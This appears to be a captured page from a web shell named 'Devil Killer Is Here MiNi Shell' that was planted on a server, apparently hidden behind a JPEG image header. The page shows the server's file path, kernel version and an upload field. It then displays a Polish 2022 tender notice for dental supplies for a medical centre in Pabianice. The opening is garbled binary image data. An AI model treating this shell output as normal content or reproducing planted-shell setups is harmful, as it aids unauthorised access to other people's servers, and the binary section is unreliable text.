JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220706/0024163801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa materiałów stomatologicznych na potrzeby PCM Sp. z o.o 37//ZP/TP1/22 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pabianickie Centrum Medyczne Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100682491</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 68</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pabianice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pcmnzoz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcmnzoz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa materiałów stomatologicznych na potrzeby PCM Sp. z o.o 37//ZP/TP1/22 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d679558b-fd11-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00241638</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://pcmnzoz.pl/index.php/zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://pcmnzoz.pl/index.php/zamowienia<br/>https://miniportal.uzp.gov.pl/- oferta<br/>https://epuap.gov.pl/wps/portal - oferta<br/>zamowienia@pcmnzoz.pl - pytania od SWZ, wyjaśnienia, dokumenty na wezwanie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji).<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) lub ID postępowania lub nr referencyjnym postępowania.<br/>3. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: zamowienia@pcmnzoz.pl <br/>4. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w ust. 3 adres email.<br/>5. Sposób sporządzania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Pani/Pana danych osobowych jest Pabianickie Centrum Medyczne Sp. z o.o. (95-200 Pabianice, ul. Jana Pawła II 68, KRS:0000330633, NIP:731-20-02-395).<br/>2.	Administrator wyznaczył Inspektora Ochrony Danych Osobowych. Dane kontaktowe:<br/> e-mail: iodo@pcmnzoz.pl;<br/>adres do korespondencji: 95-200 Pabianice, ul. Jana Pawła II 68.<br/>Administrator przetwarza Pani/Pana dane osobowe w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą: Zakup i dostawa materiałów stomatologicznych na potrzeby PCM Sp. z o.o.-.Znak sprawy: 37/ZP/TP1/22 – na podstawie art. 6 ust. 1 lit. c RODO.<br/>3.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i inne ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (z późniejszymi zmianami), dalej zwana „Pzp”, a także podmiotom uprawnionym – na podstawie umów o powierzenie przetwarzania danych osobowych (w szczególności podmiotom wspierających administratora w organizacji postępowania o udzielenie zamówienia publicznego).<br/>4.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, uwzględniając okres rękojmi i gwarancji oraz okres przedawnienia roszczeń.<br/>5.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego – konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6.	Posiada Pani/Pan:<br/>1.	prawo dostępu do danych osobowych Pani/Pana dotyczących (art. 15 RODO);<br/>2.	prawo do sprostowania Pani/Pana danych osobowych (art. 16 RODO) – przy czym skorzystanie z prawa sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>3.	prawo żądania od Administratora ograniczenia przetwarzania danych osobowych (art. 18 RODO) – z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, to jest prawa do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>7.	Nie przysługuje Pani/Panu:<br/>1.	prawo do usunięcia danych osobowych (w związku z art. 17 ust. 3 lit. b, d lub e RODO);<br/>2.	prawo do przenoszenia danych osobowych (o którym mowa w art. 20 RODO);<br/>3.	prawo sprzeciwu, wobec przetwarzania danych osobowych (na podstawie art. 21 RODO), gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8.	W przypadku gdy osoba, której dane dotyczą wnosi do Administratora o:<br/>1.	potwierdzenie, czy przetwarzane są dane jej dotyczące;<br/>2.	uzyskanie dostępu do danych jej dotyczących oraz informacji o:<br/>1.	celach przetwarzania;<br/>2.	kategoriach odnośnych danych osobowych;<br/>3.	informacji o odbiorcach lub kategoriach odbiorców, którym dane osobowe zostały lub zostaną ujawnione (w szczególności o odbiorcach w państwach trzecich lub organizacjach międzynarodowych);<br/>4.	planowanym okresie przechowywania danych lub kryteriach ustalania (ograniczona liczba znaków- pełny zakres opisany SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">37/ZP/TP1/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa i zakup materiałów stomatologicznych na potrzeby PCM Sp. z o.o. , zwana w dalszej części SWZ: „towarem” dla PCM Sp. z o.o., w ilości i asortymencie określonych w Załączniku nr 2 do SWZ – Formularz cenowy: <br/>&#34;Antyseptyczna i przeciwbólowa pasta do leczenia suchych zębodołów i stanów zapalnych kieszeni patologicznych. <br/>Skład: paraminobenzoesan butylu, jodoform, eugenol, penghawar. 10 g<br/>&#34;	szt	5<br/>&#34;Aplikatory do przenoszenia oraz/lub nakładania:<br/>Wytrawiaczy<br/>materiałów wiążących<br/>podkładów do wypełnień<br/>fluorowego lakieru<br/>płynów do tamowania krwawienia<br/>płynów do oznaczania ognisk próchnicy<br/>płynów do uszczelniania bruzd i szczelin<br/>nakładania Dycalu<br/>Opakowanie zawiera 100 aplikatorów w jednorazowym pojeminku, o rozmiarze:<br/>Regular,fine,superfine (1mm) opakowanie 100 szt<br/><br/>&#34;	opak	40<br/>&#34;Bezprzewodowa lampa poloimeryzacyjna,ładowarka,zasilacz <br/> <br/><br/>&#34;	szt	1<br/>&#34;Bloczki do zarabiania różnych materiałów : <br/> bloczki do kompozytów <br/> bloczki do glasjonomerów <br/><br/><br/>&#34;	szt	35<br/>&#34;Cement cynkowo-polikarboksylowy<br/>40g+80g proszekCement cynkowo-polikarboksylowy<br/>&#34;	szt	15<br/>Cement fosforanowy wolnowiążący, Pojemnik z proszkiem (30g), pojemnik z płynem (18g) zaopatrzony w kroplomierz, łyżeczka z tworzywa sztucznego do pobierania proszku	szt	10<br/>&#34;Cement na bazie tlenku cynku i eugenolu. Zastosowanie:<br/>Wypełnienia tymczasowe, materiał podkładowy w przypadku próchnicy głębokiej w pobliżu miazgi (pokrycie pośrednie), do stałego wypełniania kanałów korzeniowych przy użyciu ćwieków gutaperkowych<br/><br/>Cement umożliwiający szczelne wypełnienie ubytków i kanałów korzeniowych, bez podrażnienia przylegających tkanek, z niewielkim efektem analgetycznym - znieczulającym<br/>opakowanie 30gPLVR+30g płyn+25gCement na bazie tlenku cynku i eugenolu. Zastosowanie:<br/><br/><br/><br/><br/><br/><br/>&#34;	opak	2<br/>&#34;Cement fosforanowo-cynkowy do mocowania koron, mostów oraz wkładów (inlay).<br/>Zakres stosowania:<br/>Mocowanie koron, mostów i wkładów, cementowanie sztyftów i śrub, jako tymczasowe wypełnienia.<br/>opakowanie: proszek 35 g+płyn 40 ml&#34;	opak	3<br/> Cement glasjonomerowy mieszalny z wodą służący do wypełnień.Jest widoczny na zdjeciach RTG.Czas mieszania 40 sec. 30-40 sec,włącznie z czasem mieszania 3 min.3,5 min.Czas wiązania w jamie ustnej 2 min.5 min.Odporność na ściskanie 150-170 MPa 90-130 Mpa.Rozpuszczalność w wodzie 0,2-0,4%(opakowanie 35g proszek+płyn)	opak	3<br/>&#34;Chlorek etylu opakowanie 200 ml (Endospray pomarańczowy,miętowy)<br/> temperatura -50ºC - do zamrażania wacików i wałeczków - do schładzania materiałów wyciskowych<br/><br/>&#34;	opak	10<br/>&#34;Ćwieki gutaperkowe 15-40,45-80 ,15,20,25,30,35.40<br/><br/>&#34;	opak	70<br/>&#34;Ćwieki okołomiazgowe asortyment 12 szt + wiertło <br/>Ćwieki okołomiazgowe o średnicy 0,75 mm przeznaczone są do odbudowy zębów przy pomocy materiałów kompozytowych oraz amalgamatu, zwłaszcza w przypadkach ze znacznym stopniem uszkodzonych tkanek. Produkt wykonany został z czystego tytanu, dzięki czemu nie powoduje reakcji alergicznych. Wiertło dołączone do zestawu pozwala na wypreparowanie właściwego miejsca na ćwiek o optymalnych parametrach. Ćwieki dają możliwość ich delikatnego dogięcia przy pomocy dowolnego narzędzia. <br/>Produkt może być sterylizowany w temperaturze 145°C. Ćwieki dają kontrast w promieniach rtg.<br/><br/>&#34;	opak	3<br/>&#34;Dżwignia prosta,boczna prawa,boczna lewa <br/>Specyfikacja techniczna dźwigni <br/>całkowita długość dźwigni 140 mm <br/>długość rękojeści 75 mm <br/>szerokość części pracującej 5 mm <br/>długość części pracującej 65 mm <br/>zaokrąglona płaska końcówka (postać łyżeczki) <br/>prosta <br/>polerowana powierzchnia <br/>stal chirurgiczna <br/> <br/> <br/> <br/> <br/> <br/><br/><br/>&#34;	10	6<br/>&#34;Endometr bezprzewodowy <br/>Kolorowy wyświetlacz LCD 3,9 <br/>Sygnał dźwiękowy potwierdzający wskazania endometr <br/>Wyświetlanie poziomu naładowania akumulatora Li-Ion <br/>Automatyczna kalibracja urządzenia gwarantująca dokładność pomiaru <br/> 2 tryby pomiaru: żywotności miazgi, przyzębia i długości kanału korzeniowego <br/> Akcesoria w zestawie: 3x hak wargowy, 2x elektroda, 2x uchwyt endodontyczny <br/> <br/><br/><br/>&#34;	szt	1<br/>&#34;formalina buforowana r-r 4% formaliny 1 litr<br/><br/><br/>&#34;	szt	3<br/>&#34;Fluor (opakowanie 50*1ml) <br/>Lakier ochronny zawierającym fluor, stosowany w profilaktyce próchnicy oraz do znoszenia nadwrażliwości <br/>Stężenie fluoru 0,1% <br/>Bezbarwny, szybkoschnący <br/>opakowanie: 50 ampułek o pojemności 1ml.Fluor (opakowanie 50*1ml) <br/><br/><br/>&#34;	opak	5<br/>&#34;Fluor 7g <br/>baza lakieru + związku fluoru + rozpuszczalnika i zapewnia natychmiastową dostępność fluoru. Opakowanie 7g <br/><br/><br/>&#34;	opak	50<br/>&#34;Folia ochronna na podnóżek fotela stomatologicznego z gumką<br/>&#34;	szt	8<br/>&#34;Frezy na prostnicę protetyczną<br/><br/>&#34;	szt	10<br/>&#34;Formówki na pasku <br/>Rozmiar: 1-3, formówki przeznaczone do zębów przednich. <br/>Opakowanie zawiera 160 różnych kształtek&#34;	opak	5<br/>&#34;Formówka dentystyczna typu Ivory<br/><br/>&#34;	szt	3<br/>&#34;Formówka typu Mifam<br/>&#34;	szt	3<br/>&#34;Formówka dentystyczna typu Nystrom do wypełniania ubytków na powierzchniach stycznych zębów<br/>Lewa,prawa&#34;	szt	4<br/>&#34;Gumki do akrylu na prostnicę<br/><br/>&#34;	szt	20<br/>&#34;Gumki średnioziarniste A3M,A5M<br/><br/>&#34;	szt	25<br/>&#34;Gumki do polerowania:mały płomyk,duży płomyk,mały kielich,duży kielich,mały dysk,duży dysk<br/><br/>&#34;	szt	60<br/>&#34;Gumka do ślinociągów<br/><br/>&#34;	szt	8<br/>&#34;Gatess rozmiary 1,2,3,4,5,6<br/><br/>&#34;	szt	6<br/>&#34;Gaz do palnika 300 ml <br/> W komplecie zestaw końcówek do różnego rodzaju zaworów. <br/>Przeznaczony do nabijania zapalniczek gazowych, żarowych, palników, zapalaczy, zapalarek. <br/> <br/> <br/> <br/> <br/> <br/><br/>&#34;	szt	10<br/>&#34;Giz zestaw (lakier+proszek) <br/>chemoutwardzalny cement glassjonomerowy aktywowany wodą, służący jako: materiał podkładowy, wypełnieniowy oraz do cementowania wszystkich prac protetycznych i ortodontycznych 10gGiz zestaw (lakier+proszek) <br/><br/><br/>&#34;	opak	15<br/>&#34;Giz kolor A2 <br/>chemoutwardzalny cementem glassjonomerowym aktywowanym wodą typu Fill II,10gGiz kolor A2 <br/><br/>&#34;	szt	10<br/>&#34;Hak chirurgiczny <br/>• długość 210 mm <br/>• szerokość części rozwierającej pole operacyjne 40 x 11 mm <br/>• szeroka rękojeść <br/>• stal chirurgiczna medyczna <br/>• roczna gwarancja producenta <br/>• szerokość 50 x 11 mm / długość 210 mm <br/>• szerokość 40 x 11 mm / długość 210 mm <br/>• szerokość 32 x 14 mm / długość 210 mm <br/>• szerokość 30 x 11 mm / długość 210 mm <br/><br/>&#34;	szt	4<br/>&#34;Hak wargowy do Endometru Uniwersalne haki, elektrody wargowe stosowane we wszystkich typach Endometrów.<br/>&#34;	szt	5<br/>&#34;Igły do wypełniania kanału 25(opakowanie 5 szt)<br/><br/>&#34;	opak	25<br/>&#34;Igły <br/>ze stali nierdzewnej do sondowania kanałów korzeniowych i podawania leków. <br/>Opakowania 12 sztuk <br/><br/><br/>&#34;	szt	5<br/>&#34;Igłotrzymacz Charakterystyka produktu <br/> Łatwy w obsłudze igłotrzymacz <br/> Ze sprężyną i blokadą <br/> Rowkowane bransze umożliwiają pewne mocowanie igły <br/> Ze stali medycznej <br/> Możliwość sterylizacji <br/> <br/> <br/> <br/> <br/><br/><br/>&#34;	szt	5<br/>&#34;Kapsułki do przygotowania amalgamatu <br/>Parametry produktu: <br/>stosunek stopu do rtęci Hg = 1:1 <br/>stop metali: 43% Ag, 32% Sn, 25% Cu <br/>wytrzymałość na ściskanie po 1 godzinie &gt; 90 Mpa <br/>wytrzymałość na ściskanie po 24 godzinach &gt; 400 Mpa <br/>zmiana objętości po 24 godzinach (%) &lt; + 0,7 <br/>pełzanie stateczne po 7 dniach (%) &lt; 0,2<br/>&#34;	opak	2<br/>&#34; <br/>Koncentrat do rozcieńczenia do płukania jamy ustnej. Substancja czynna: dwuglomian chlorheksydyny (roztwór 20%) 0,5 ml, chlorobutanol 0,5g etanol, gliceryna, docusat sodu, czerwień koszenilowa, naturalny miętowy środek smakowy, aromat miętowy, woda oczyszczona. Zawartość alkoholu 42,8% v/vW. 500 ml <br/> <br/><br/><br/>&#34;	szt	5<br/>&#34;Kaniula igła z kulką do płukania <br/> <br/><br/><br/>&#34;	szt	5<br/>&#34;Karpula z możliwością aspiracji Strzykawka stomatologiczna z aspiracją ręczną nazywana karpulą do znieczulenia miejscowego,w której umieszcza się ampułkę z anestetykiem i mocuje igłę na gwintowatym łączniku. <br/>Przeznaczona do znieczulenia nasiękowego w dziąsło w bezpośrednią okolicę zęba(zazwyczaj anestezja wszystkich zębów szczęki i częściowa w przednim odcinku żuchwy,przy zębach trzonowych zazwyczaj potrzeba dodatkowego znieczulenia) oraz przewodowego-donerwowego, jak również okołonerwowego(przerywa przewodnictwo pnia nerwu skutkując zniesieniem bólu,w zabiegach dotyczących zębów dolnych trzonowych). <br/><br/><br/>&#34;	szt	6<br/>&#34;Kalka prosta 80 gu(opakowanie 144 kartki)<br/><br/>&#34;	opak	10<br/>&#34;Kalka zgryzowa podkowiasta (opakowanie 72 szt)<br/>&#34;	opak	15<br/>&#34;Końcówki do skalera NSK <br/>Dostępne końcówki <br/>• G1 / GD1 - usuwanie kamienia naddziąsłowego z zębów siecznych, szyjek zębów trzonowych i przedtrzonowych, <br/>• G2 / GD2 - usuwanie masywnych złogów kamienia naddziąsłowego, <br/>• G3 / GD3 - usuwanie kamienia naddziąsłowego, poddziąsłowego oraz z przestrzeni międzyzębowych, <br/>• G4 / GD4 - usuwanie kamienia z powierzchni naddziąsłowych, <br/>• G5 / GD5 - usuwanie kamienia z powierzchni naddziąsłowych oraz szyjek zębów, <br/>• G6 / GD6 - usuwanie masywnych złogów kamienia z powierzchni naddziąsłowych zębów.Końcówki do skalera NSK <br/> <br/> <br/><br/><br/>&#34;	szt	15<br/>&#34;Kliny transparentne 100 szt opakowanie<br/><br/>&#34;	opak	2<br/>&#34;Kliny drewniane asortyment 100 szt<br/><br/>&#34;	opak	2<br/>&#34;Kątnica na mikrosilnik NSK<br/><br/>&#34;	szt	5<br/>&#34;Kieliszek szklany do dawkowania leków,kieliszek z korkiem zielony<br/>&#34;	szt	5<br/>&#34;Kolornik Vitapan<br/><br/>&#34;	szt	2<br/>&#34;kwas cytrynowy 40%/200g w opakowaniu<br/><br/>&#34;	opak	5<br/>kulki z waty XS 100 szt w opakowaniu	opak	10<br/>&#34;kamienie na turbinę 4 ksztalty,do polerowania kompozytów oraz porcelany.Na turbinę i kątnicę<br/><br/>&#34;	szt	30<br/>&#34;końcówki mieszajace do masy light body ora;,intra tips<br/><br/>&#34;	szt	50<br/>&#34;<br/>kleszcze do cięcia drutu ze stali chirurgicznej<br/><br/><br/>&#34;	szt	1<br/>&#34;kleszcze krampony do cięcia i doginania drutu 0,8/wykonane ze stali chirurgicznej 1rok gwarancji 1 szt w opakowaniu<br/><br/>&#34;	szt	1<br/>&#34;kleszcze do ekstrakcji zębów,stal nierdzewna<br/><br/>&#34;	szt	5<br/>&#34;kształtki celuloidowe do dobudowy zębów górne asortyment (80 szt w opakowaniu)<br/><br/>&#34;	opak	3<br/> (całość opisu SWZ- z powodu ograniczonej liczny znaków w Załączniku nr 2 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141800-8 - Wyroby 